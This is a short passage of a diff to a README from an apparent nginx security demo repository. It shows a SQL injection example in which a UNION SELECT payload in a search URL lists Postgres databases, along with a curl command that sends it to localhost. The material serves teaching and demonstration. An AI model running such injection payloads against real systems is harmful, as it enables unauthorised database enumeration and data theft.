wesdoyle/nginx-security-demo/README.md

 ]
 ```

-Now that the attacker knows that the database appears to be Postgres, they can then write a query to list databases:
-`http://localhost/search?prefix=Intro' UNION SELECT 1, datname, NULL, NULL FROM pg_database--`.
+**Now that the attacker knows that the database appears to be Postgres, they can then write a query to list databases. (`http://localhost/search?prefix=Intro' UNION SELECT 1, datname, NULL, NULL FROM pg_database--`)**

 ```sh
 $ curl http://localhost/search\?prefix\=Intro%27%20UNION%20SELECT%201,%20datname,%20NULL,%20NULL%20FROM%20pg_database-- | jq